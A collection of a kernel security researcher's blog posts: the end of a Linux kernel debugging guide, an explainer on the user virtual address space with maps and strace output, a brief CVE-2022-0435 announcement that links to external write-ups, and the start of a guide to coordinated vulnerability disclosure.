If you’re building from source, just include CONFIG_DEBUG_INFO=y and optionally CONFIG_GDB_SCRIPTS=y and you’ll find your vmlinux with debug symbols in your build root (see compiling/README.md for more info on building)
- ./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS will enable these in your config with minimal fiddling
If you’re running a distro kernel, you can check your distro’s repositories to see if you can pull debug symbols
- On Ubuntu, if you update your sources and keyring [1], you can pull the debug symbols by running $ sudo apt-get install linux-image-$(uname -r)-dbgsym and should find your vmlinux @ /usr/lib/debug/boot/vmlinux-$(uname-r)

And just like that, we’re done! jk, there’s one more common gotcha (that I always forget) and that’s KASLR: Kernel Address Space Layout Randomization. As it sounds, this randomizes where the kernel image is loaded into memory at boot time; so the address gdb reads from the vmlinux will naturally be wrong…

You can either add nokaslr to your boot options, typically via grub menu at boot
Or by editing /etc/default/grub and including nokaslr in GRUB_CMDLINE_LINUX_DEFAULT

After that we really are ready, and can repeat the steps from before, remember to also load our vmlinux with gdb:

$ gdb vmlinux
...
gef➤  target remote :12345 
... 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#1] Id 2, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#2] Id 3, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#3] Id 4, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81c3f9fe → native_safe_halt()
[#1] 0xffffffff81c3fc4d → arch_safe_halt()
[#2] 0xffffffff81c3fc4d → acpi_safe_halt()
[#3] 0xffffffff81c3fc4d → acpi_idle_do_entry(cx=0xffff88810187d864)
[#4] 0xffffffff816e4201 → acpi_idle_enter(dev=, drv=, index=)
[#5] 0xffffffff8198e56d → cpuidle_enter_state(dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 , index=0x1)
[#6] 0xffffffff8198e88e → cpuidle_enter(drv=0xffffffff8305dfa0 , dev=0xffff888105a61c00, index=0x1)
[#7] 0xffffffff810e7fa2 → call_cpuidle(next_state=0x1, dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 )
[#8] 0xffffffff810e7fa2 → cpuidle_idle_call()
[#9] 0xffffffff810e80c3 → do_idle()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤

Awesome! Now gdb knows exactly where we our, and gef provides us lots of useful information in it’s ctx menu, which you can always pop up with the ctx command.

I’ve cut it off for brevity but we can at a glance see sections (might need to scroll right for the headings) for registers, stack, code, threads and trace!

On top of that, as I’ll touch on in Misc GDB Tips below, we’re able to explore all the kernel structures and more thanks to the symbols we now have.

Loadable Modules

As a quick aside, you might find out that some symbols for certain modules are missing, despite doing all that vmlinux faff above. This is because not all modules are compiled into the kernel, some are compiled as loadable modules.

This means that the modules are only loaded into memory when they’re needed, e.g. via modprobe. We can check if a module is loaded in our .config:

CONFIG_YOUR_MODULE=y defines an in-kernel module
CONFIG_YOUR_MODULE=m defines a loadable kernel module

For loadable modules, we need to do a couple of extra steps, in addition to those above, in order to let gdb know about these symbols:

Copy the module’s your_module.ko from your debugging target; try /lib/modules/$(uname -r)/kernel/
On your debugging target, find out the base address of the module; try sudo grep -e "^your_module" /proc/modules
In your gdb session, you can now load in the module by (gdb) add-symbol-file your_module.ko 0xAddressFromProc - voila!

Sorted! Now the symbols from your_module should be available in gdb! Just remember that even with KASLR disabled, this address can be different each time you load the module, but you only need to grab the your_module.ko once at least.

Misc GDB Tips

Oof, well this post is already careening towards 4000 words (and I did this voluntarily, for fun?!), so I think I’ll just link to my repository where you can find some useful gdb/gef commands for debugging the Linux kernel!

linux-kernel-resources/debugging at main · sam4k/linux-kernel-resources

Other Stuff

As we’re transitioning into a speedrun, congratulations to anyone who read the whole thing, I’ll attempt to quickly touch on some other useful debugging resources:

drgn: remember earlier, when I said debugging the kernel your using can be tricky? Well drgn is an extremely programmable debugger, written in python (and not 36 years ago), that among other things allows you to do live introspection on your kernel. I still need to explore this more, but I wouldn’t see it as a replacement for gdb for example, but a different tool for different goals.
strace: ah yes, our old friend, strace(1). The system call tracing utility can be useful for complimenting your kernel debugging by tracing the interactions between your poc/userland interface/program and the kernel. With minimal faff you can hone in on what kernel functions you may want to focus your debugging endeavours on.
procfs: another reminder about the various introspection available via /proc/; you saw earlier that we made use of /proc/modules. There’s plenty to explore here.
man pages: don’t sleep on the man pages! Although there isn’t generally pages on kernel internals, the syscall section (2) can help with understanding some of the interactions that go on
source: due to word count concerns, oops, and the fact I never really use it, I haven’t included adding source into gdb but that doesn’t mean you can’t have it up for reference! I always try to have a copy of source handy to explore, not to mention the documentation that’s usually available somewhere in the kernel too

https://www.sourceware.org/gdb/
https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html
Future post idea? Dive into some debugging internals
https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb–vm
If your guest is a different architecture to your host, gdb needs to needs to know about it, so you’ll need to install and use gdb-multiarch

FAQ

So this is a little bit of an experiment, and maybe more suited to the GitHub repo, but if anyone has any questions feel free to @ me on Twitter and I’ll keep try keep this FAQ updated. Also, if anyone has any suggestions for FAQs, I’m happy to add those too :)

Postamble

Talk about feature creep, eh? We certainly covered a lot of ground in this post: from building the kernel to patching modules to setting up our debugging environment.

Hopefully some of this (or all!) have been useful, and maybe helped demystify things. As I briefly mentioned in the intro, I’ve included all the essentials in a github repository, which I’ll continue to update with any useful Linux kernel resources/demos/shenanigans.

GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists.

I think by nature of the work we do, as programmers and “hackers”, a lot of times we find ourselves creating hacky solutions and shortcuts, then through some twisted process of natural selection some of these make their way into our workflow.

Though, perhaps because we consider them too niche or too messy, we often don’t share these solutions or quick tricks and so the cycle continues. Is this necessarily a bad thing? Of course not! I love to tinker and believe me, I have many a bash script that should never see the light of day, but perhaps there’s also a few that would help others if they did.

So really, this post is just a culmination of my own hacky, messy natural selection that has occurred during my time working on kernel stuff, so don’t @ me if it’s horribly wrong (DM me instead, pls help me), but hopefully there’s some takeaways here that will inspire others to tinker and perhaps save some time in the process.

Obligatory @ me for any suggestions, corrections or questions!

exit(0);

Linternals: The User Virtual Address Space

sam4k — Sun, 20 Mar 2022 19:00:00 +0000

Ready to get dive back into some Linternals? I hope so! So to recap, last time, we covered some virtual memory fundamentals including:

Virtual vs physical memory
The virtual address space
The VM split (user and kernel virtual address spaces)

This time we’re going to zoom in and focus on the two parts of the virtual memory split, taking a look at the user and kernel virtual address spaces.

Hopefully, after that, we’ll have a good idea of how - and why - our Linux system uses virtual memory. At which point we’ll take a look at how this is all implemented behind the scenes, examining some kernel and hardware specifics!

0x04 User Virtual Address Space
- Userspace Mappings
- The Setup
  - brk()
  - mmap()
  - mprotect()
  - execve()
- Threads
- ASLR
- Wrapping Up In UVAS
Next Time!

0x04 User Virtual Address Space

Alrighty then, first things first, let’s actually take a look at what a typical process actually uses the user virtual address space (UVAS) for. Luckily, I don’t have to whip up a diagram for this, as we can use the /proc filesystem!

❓

procfs is a virtual filesystem that is created at boot. It acts as an interface to internal data structures in the kernel. It can be used to obtain information about the system and to change certain kernel parameters at runtime (sysctl). [1]

Inside procfs, you can inspect running processes by PID. For example, the file /proc/854/maps will contain information about the mappings for process with PID 854.

To make life easier, there’s a handy link, /proc/self/, which will point to the process currently reading the file - pretty neat! Beyond maps, there’s all sorts of information we can learn from procfs; check man procfs for more info.

https://www.kernel.org/doc/html/latest/filesystems/proc.html

Userspace Mappings

Back on topic! Let’s use the procfs to take a closer look at what our UVAS is being used for. From the man page, we learn the maps procfs file contains “the currently mapped memory regions and their access permissions"m for a process.

We’ll touch more on the implementation later, but for now it’s worth remembering that the virtual address space is vast and largely empty. If a process needs to use some memory, either to load the contents of a file or to store data, it will ask the kernel to map that memory appropriately. Now that virtual address is actually pointing to something.

Using the self link we talked about earlier, and the maps file, we can use cat to output the details of it’s own memory mappings:

$ cat /proc/self/maps 
5577277d1000-5577277d3000 r--p 00000000 00:19 868257                     /usr/bin/cat
5577277d3000-5577277d8000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5577277d8000-5577277db000 r--p 00007000 00:19 868257                     /usr/bin/cat
5577277db000-5577277dc000 r--p 00009000 00:19 868257                     /usr/bin/cat
5577277dc000-5577277dd000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
557728bca000-557728beb000 rw-p 00000000 00:00 0                          [heap]
7fc863779000-7fc863a63000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fc863a63000-7fc863a66000 rw-p 00000000 00:00 0 
7fc863a66000-7fc863a92000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fc863a92000-7fc863c08000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c08000-7fc863c5c000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5c000-7fc863c5d000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5d000-7fc863c60000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c60000-7fc863c63000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c63000-7fc863c72000 rw-p 00000000 00:00 0 
7fc863c7e000-7fc863ca0000 rw-p 00000000 00:00 0 
7fc863ca0000-7fc863ca2000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863ca2000-7fc863cc9000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cc9000-7fc863cd4000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd5000-7fc863cd7000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd7000-7fc863cd9000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffddc9a0000-7ffddc9c1000 rw-p 00000000 00:00 0                          [stack]
7ffddc9f4000-7ffddc9f8000 r--p 00000000 00:00 0                          [vvar]
7ffddc9f8000-7ffddc9fa000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

Sweet! Well, there’s a lot to unpack here, though some of it should look familiar. Consulting man procfs we can see the columns are as follows:

(virtual) address, perms, offset, dev, inode, pathname

If we recall from last time, on a typical x86_64 setup like mine, the most significant 16 bits (MSB 16) of userspace virtual addresses are 0 and 1 for kernel virtual addresses.

This means we can normally spot kernel addresses at a glance as they begin 0xffff.... while userspace addresses begin with 0x0000... and are as a result typically shorter.

Anyway, before we scroll too far away from the code block (oops), let’s unpack some of these lines of output shall we?

Lines 2-6: here we can see the mappings for the binary being run, found at /usr/bin/cat. Why is there multiple mappings for one binary file? Typically programs are made up of multiple sections, with differing perms. The .text section where the code is? We’ll want that readable & executable. Some portions of data, like our static consts want to be read only (.rodata), while mutable data wants to be readable and writable (.data) [1]
Line 7: procfs uses the pseudo-path [heap] to describe the mapping for the heap (no surprise there); a dynamic memory pool
Lines 8,10-15: next up we can see several shared libraries being mapped into memory, for the program to use. We can see locale information and libc; again these may be split up into multiple mappings as touched on a moment ago [2]
Lines 9,16,17: these weird mappings with no pathname, are called anonymous mappings and are not backed by any file. This is essentially a blank memory region that a userspace process can use at it’s discretion. Examples of anonymous mappings include both the stack and the heap [3]
Lines 18-22: ld.so is the dynamic linker that is invoked anytime we run a dynamically linked program (a quick check of file /usr/bin/cat will confirm this is indeed a dynamically linked program!)
Line 23: another pseudo-path, [stack] is the mapping for our process’s stack space
Line 25: The “virtual dynamic shared object” (or vDSO) is a small shared library exported by the kernel to accelerate the execution of certain system calls that do not necessarily have to run in kernel space [5]
Line 24: The vvar is a special page mapped into memory in order to store a “mirror” of kernel variables required by the virtual syscalls exported by the kernel
Line 26: The vsyscall mapping is actually defunct; it was a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn’t require elevated privileges and hence the whole user -> kernel mode context switch. Suffice to say it’s defunct now, and calls to vsyscall table still work for compatible, but now actually trap and act as a normal syscall [6]

And just like that we’ve pieced together the various userspace (and some kernel stuff) mappings for an everyday program like cat! Pretty neat. In addition we’ve dived into some of the tools the kernel provides us to examine this information.

For more information on the different sections of our binary, we can cross-reference the offset information we get from /proc/self/maps with the ELF section headers using objdump -h /usr/bin/cat
ldd lets us print the shared libraries required by a program, we can explore this more by checking out ldd /usr/bin/cat, though for reasons out of scope for this talk, it won’t look identically to our maps output
If we want to get ahead of ourselves, man 2 mmap [4] describes the system call userspace programs use to ask the kernel to map regions of memory
The 2 in man 2 mmap says we want to look at man section 2, for syscalls, and not section 3 for lib functions. man -k mmap lets us search all the sections for references to mmap
Implementing virtual system calls @ LWN
As expected, we can see the vsycall adress is located within the kernel half of the virtual address space, by the leading 0xffff...

The Setup

I think I’m going to cover kernel and hardware side of things in coming sections, but I think it’s worth touching on how we go from running cat /proc/self/maps to the memory mapping we saw above.

In the last part we mentioned that system calls act as the fundamental interface between userspace applications and the kernel. If an unprivileged userspace process needs to do a privileged action (e.g. map some memory), it can use the syscall interface to ask the kernel to carry out this action on it’s behalf [1].

Now that we know what’s being mapped, let’s have a closer look on how, by revisiting strace. strace simply traces the system calls and signals made by a program. As we know memory mapping is handled by the kernel and system calls are how programs get the kernel to do this, strace seems like a good bet!

$ strace cat /proc/self/maps
execve("/usr/bin/cat", ["cat", "/proc/self/maps"], 0x7fff3a014fd8 /* 61 vars */) = 0
brk(NULL)                               = 0x5622ee613000
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffe5d536650) = -1 EINVAL (Invalid argument)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=185283, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 185283, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa129bcd000
close(3)                                = 0
openat(AT_FDCWD, "/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\324\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 80, 848) = 80
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\205vn\235\204X\261n\234|\346\340|q,\2"..., 68, 928) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2463384, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bcb000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2136752, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fa1299c1000
mprotect(0x7fa1299ed000, 1880064, PROT_NONE) = 0
mmap(0x7fa1299ed000, 1531904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2c000) = 0x7fa1299ed000
mmap(0x7fa129b63000, 344064, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a2000) = 0x7fa129b63000
mmap(0x7fa129bb8000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1f6000) = 0x7fa129bb8000
mmap(0x7fa129bbe000, 51888, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fa129bbe000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa1299be000
arch_prctl(ARCH_SET_FS, 0x7fa1299be740) = 0
set_tid_address(0x7fa1299bea10)         = 28003
set_robust_list(0x7fa1299bea20, 24)     = 0
rseq(0x7fa1299bf0e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7fa129bb8000, 12288, PROT_READ) = 0
mprotect(0x5622ec6d3000, 4096, PROT_READ) = 0
mprotect(0x7fa129c30000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7fa129bcd000, 185283)          = 0
getrandom("\x62\xf6\x2b\x64\xd3\x81\xee\x98", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5622ee613000
brk(0x5622ee634000)                     = 0x5622ee634000
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=3053472, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 3053472, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa1296d4000
close(3)                                = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
openat(AT_FDCWD, "/proc/self/maps", O_RDONLY) = 3
newfstatat(3, "", {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bd9000
read(3, "5622ec6c9000-5622ec6cb000 r--p 0"..., 131072) = 2153
write(1, "5622ec6c9000-5622ec6cb000 r--p 0"..., 21535622ec6c9000-5622ec6cb000 r--p 00000000 00:19 868257                     /usr/bin/cat
5622ec6cb000-5622ec6d0000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5622ec6d0000-5622ec6d3000 r--p 00007000 00:19 868257                     /usr/bin/cat
5622ec6d3000-5622ec6d4000 r--p 00009000 00:19 868257                     /usr/bin/cat
5622ec6d4000-5622ec6d5000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
5622ee613000-5622ee634000 rw-p 00000000 00:00 0                          [heap]
7fa1296d4000-7fa1299be000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fa1299be000-7fa1299c1000 rw-p 00000000 00:00 0 
7fa1299c1000-7fa1299ed000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fa1299ed000-7fa129b63000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fa129b63000-7fa129bb7000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb7000-7fa129bb8000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb8000-7fa129bbb000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbb000-7fa129bbe000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbe000-7fa129bcd000 rw-p 00000000 00:00 0 
7fa129bd9000-7fa129bfb000 rw-p 00000000 00:00 0 
7fa129bfb000-7fa129bfd000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129bfd000-7fa129c24000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c24000-7fa129c2f000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c30000-7fa129c32000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c32000-7fa129c34000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffe5d517000-7ffe5d538000 rw-p 00000000 00:00 0                          [stack]
7ffe5d5c7000-7ffe5d5cb000 r--p 00000000 00:00 0                          [vvar]
7ffe5d5cb000-7ffe5d5cd000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
) = 2153
read(3, "", 131072)                     = 0
munmap(0x7fa129bd9000, 139264)          = 0
close(3)                                = 0
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++

As we mentioned last time, there’s a lot going on here for a program we expect to just be doing the equivalent of read(/proc/self/maps) and write(stdout. In fact, on line 47 & 48 we can see just that happening. So what’s up with the rest?

I’m thinking it might be out-of-scope for this post to do a line-by-line breakdown (maybe a more specific post about ELFs and processes and stuff?), but let’s highlight some of the main syscalls used for setting up our memory mapping:

brk()

The brk() syscall is used to adjust the location of the “program break”, which defines the end of the process’s data segment (aka end of the heap).

❓

void *brk(void *addr);

brk(NULL) makes no adjustment, so returns the current program break. We can see this on line 3, which is likely called during initialisation to figure out where the current heap ends, for memory management libs like malloc.

Later on line 37 we can see another call to brk(), asking to extend the program break to 0x5622ee634000. If we take a look at the maps output on line 53, we can in fact see the heap does end at 0x5622ee634000 now! Sweet :)

mmap()

This is the big gun, responsible for the fabled “mappings” we’ve been yapping on about. The mmap() syscall is used to create memory mappings (and munmap() for unmapping them). For more info on args and more, don’t forget to console man 2 mmap.

❓

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

Remember, we can use mmap() to either map a file or device to virtual memory or simply to allocate a black region of memory to a virtual address:

On line 10 we openat() our libc, identified by file descriptor 3. Then in lines 18-22 we can see we make a series of mmap()’s with the fd arg set to 3; we can then cross-reference the permissions (e.g. PROT_READ|PROT_WRITE) and return addresses with the libc mappings we can see in our maps output on lines 56-61
Conversely we can see some anonymous mappings, where the fd is set to -1 and mmap() is passed the flag MAP_ANONYMOUS, like line 46 [2]

mprotect()

If mmap() is the big gun, then mprotect() is the syscall used set the protections for a mapped region of memory (yeah, I couldn’t think of an analogy okay). Typically these protections may be any combination of read, write and execute access flags.

❓

int mprotect(void *addr, size_t len, int prot);

While we can include protection flags via the prot arg for mmap(), mprotect() allows us to set page granular access flags which we can update with each call, without having to map new regions of memory each time.

execve()

Some of you might have noticed that while we can see regions being mapped for locale-archive, libc; what happened to /usr/bin/cat itself? Again, trying to keep within scope of virtual memory, this setup is handled by the initial execve() system call on line 1.

❓

int execve(const char *pathname, char *const argv[], char *const envp[]);

When a new processes is forked (created), execve() then “executes the program referred to by pathname” [3]. This initial call to execve() parses our ELF file /usr/bin/cat and initialises the necessary segments (e.g. text, stack, heap and data).

It’s worth noting that when a process is created, it is done via fork(), which creates a new process by duplicating the calling process. However, execve() will create a new and empty virtual address space for the application at pathname.

A deep dive on syscalls is out of scope for this talk, but I might touch on it down the line. In the meantime, man pages are your friend, try man syscalls :)
Honestly, without digging some more not 100% sure what these are being used for, though likely for something by the shared libs - exercise for the reader? :P
Surprise, surprise this is from man 2 execve!

Threads

So, we’ve talked a lot about how are usermode processes live in happy isolation within the sandboxed virtual address spaces. Is this always the case? Nope, and one reason is threads.

Threads are essentially light-weight processes and represent a flow of execution within an application. The reason they’re “light-weight processes” is that when threads are created, instead of using fork() they use a similar system call, clone().

clone() is also used to create a process, but allows more control over what resources are shared between the caller and callee. As a result, in Linux, threads share the same virtual address space and mappings but have separate heap & stack mappings.

ASLR

Some of you eager enough to run these commands multiple times may have noticed that the addresses for your mappings change each time you run cat, what gives?

Without deviating too off-topic, this is actually normal! It’d be more concerning if nothing changed, as this is the result of a mitigation called ASLR: Address Space Layout Randomisation [1].

ASLR does exactly what it says on the tin, randomising by default the virtual addresses that the stack, heap and shared libraries are mapped to each time the program is run. This helps mitigate exploitation techniques that rely on knowing where stuff is in memory!

Modern compilers are also able to compile code as “position independent” [2], which tl;dr means we can also randomise the virtual address of the executable code as well! Pretty neat :)

Of course, I’d be remiss if I didn’t mention there’s a procfs file to check whether ASLR is currently enabled: cat /proc/sys/kernel/randomize_va_space [3]

Wrapping Up In UVAS

And there we have it! Hopefully this has provided a high level overview of the user virtual address space, we’ve covered:

That the virtual address space is split up into two sections, the lower half being the unprivileged user virtual address space (UVAS)
Userspace is limited in what it can do, but can ask the kernel to perform privileged actions on its behalf via the system call interface
We looked at what a typical application, cat, uses the UVAS for: loading and mapping the code and data into memory, allocating memory for the heap and stack as well as mapping in library files such as libc and locale information
Next we took a brief look at the system calls that userspace applications can use to get the kernel to setup their virtual address space

Next Time!

Can you believe I planned to wrap everything up in this post? Of course I did, whoops! Suffice to say, we still have a lot to cover in an indeterminate number of posts!

Coming up we’ll context switch and take a closer look at what goes in in the kernel virtual address space and how it’s mapped. After that, we’ll get technical as we figure out how all this is implemented via the kernel and hardware features.

Thanks for reading!

exit(0);

CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel

sam4k — Tue, 15 Feb 2022 23:00:00 +0000

My last post, a guide on disclosing Linux kernel vulns, might have been a bit of a giveaway, but recently I discovered a vulnerability in the Linux kernel that’s been lurking there since 4.8 (July 2016)!

Now that the embargo is up, I can share it with the world! CVE-2022-0435 is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel (don’t worry, if you haven’t heard of TIPC, it probably isn’t loaded by default on your distro).

Find Out More

If you want a brief technical overview of the vulnerability, check out the advisory I posted to the oss-security mailing list:

oss-sec: CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module since 4.8 (net/tipc)

For a more detailed analysis of the vulnerability, covering the same content as the advisory, check out my blog post over on the Immunity blog:

CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel

Focusing more on exploitation, I discuss the work and techniques involved in writing a contemporary remote kernel exploit, using CVE-2022-0435 as a case-study:

Writing a Linux Kernel Remote in 2022

Get in Touch!

General reminder that if you have any questions / corrections / suggestions / request for content, regarding CVE-2022-0435 or any of my Linuxy security-y stuff, feel free to @ me on Twitter!

exit(0);

A Dummy's Guide to Disclosing Linux Kernel Vulnerabilities

sam4k — Sat, 05 Feb 2022 19:58:40 +0000

Bit of a niche one today, but my hope is that at least one person will be able to avoid some of the hurdles I had to tackle and the rest will at least get an interesting insight into the process behind responsibly disclosing vulnerabilities in the Linux kernel.

For context, I recently started my new position as a Sr. Security Researcher and during some of my research I discovered a fairly serious looking vulnerability in a part of the Linux kernel - pretty exciting right?! After ~~double~~ ~~triple~~ quadruple checking what I thought I found was, in fact, what I thought I found (and a couple of fist pumps later) - I asked my boss: what do now???

And that brings you all up to speed, as the post below is the culmination of my various Googlings, sifting through docs, advice from community members and maintainers and array of gotchas encountered all in the pursuit of answering the question: what do now?!

Some More (Important) Context
Initial Preparation
The Disclosure Process
Wrapping Up

Some More (Important) Context

Before we dive into the process proper, it’s worth highlighting some important context and disclaimers around the nature of this post:

First and foremost, this is advice based on my personal experience and that of the community members I interacted with. One thing worth knowing is that the open-source community is not a hive mind, so opinions will differ![1]
On the topic of personal experience, this is written from the perspective of a zoomer who was born in 1997 and who’s prior experience with email was limited to using Gmail for Steam 2FA
Finally, there are different routes for reporting/disclosing based on the nature of the bug. In this case I’m specifically referring to unpatched vulnerabilities within the Linux kernel; where in this instance by vulnerability, I am referring to a “sensitive bug” that could lead to privilege escalations, facilitate PE (KASLR/canary leaks), remote DoS etc.

That being said, I hope the majority of the content of this post has some objective value (otherwise RIP my Saturday morning spent on this)

Initial Preparation

Okay, now that we’ve laid the groundwork and set some context - let’s get stuck into how we’re gonna go about disclosing this crazy kernel vuln we’ve just found! Well, after we make sure we’re ready to disclose this crazy kernel vuln … it is a crazy kernel vuln right?[1]

The more information and understanding you go into the disclosure process with and are able to share, the easier the job is for everyone involved.

Understandably, you don’t want to spend years sat on an 0day to the point you’re able to rewrite the whole subsystem blindfolded, but consider the following:

What is the impact of the vulnerability? Does it lead to privilege escalation? Is it remotely reachable? Is it trivial or difficult to exploit?
What kernel versions are affected? What commit was the vulnerability introduced in?
What part of the kernel is affected? Is it in the core kernel, a networking module?
Is this vulnerability reachable in most configurations, or only in specific environments/use cases? What distributions are affected?
How would you fix the vulnerability? Are there existing mitigations?

If you find yourself in this position and doubting yourself, it’s okay, me too :) In fact it wasn’t until my CVE was assigned that I thought “Huh, it is legit after all”; best solution is harness this doubt into thorough testing, research and notes to prove yourself right (or wrong about being wrong?)

The Disclosure Process

It’s time. We’ve put in the work, verified our findings and got a solid understanding of the vulnerability… so, uh, who do we tell? Good question!

coordinated vulnerability disclosure, or “CVD” (formerly known as responsible disclosure)[1] is a vulnerability disclosure model in which a vulnerability or an issue is disclosed to the public only after the responsible parties have been allowed sufficient time to patch or remedy the vulnerability or issue. — Wikipedia

CVD for the Linux kernel is handled, in typical Linux fashion, over mailing lists. There’s a few different mailing lists out there, but in particular we’re interested in the following:

security@kernel.org[1]: private list for Linux kernel security team, who will help verify the bug & facilitate a fix as part of the initial embargoed disclosure
linux-distros@vs.openwall.org: private list of security contacts for various Linux distributions, used as a channel to notify distributions of “non-public medium or high severity security issues” as part of the initial embargoed disclosure
oss-security@lists.openwall.com: public list which anyone can subscribe to, for “public discussion of security flaws, concepts, and practices in the Open Source community” and used for public disclosure of security vulns

It’s worth noting when Googling terms such as “linux vulnerability disclosure” the top kernel doc result is actually for v4.10 and contains less information than the latest versions; can be fixed by adjusting the URL or going here

0x00 An Overview

Before diving into the specifics, below is a quick summary of what the disclosure process will typically look like:

Notify security@kernel.org, linux-distros@vs.openwall.org and relevant maintainers of the vulnerability; establishing details, embargo period, CVE request and possible fix
Discussion ensues and ideally a fix is settled on and the affected parties/distributions are kept in the loop
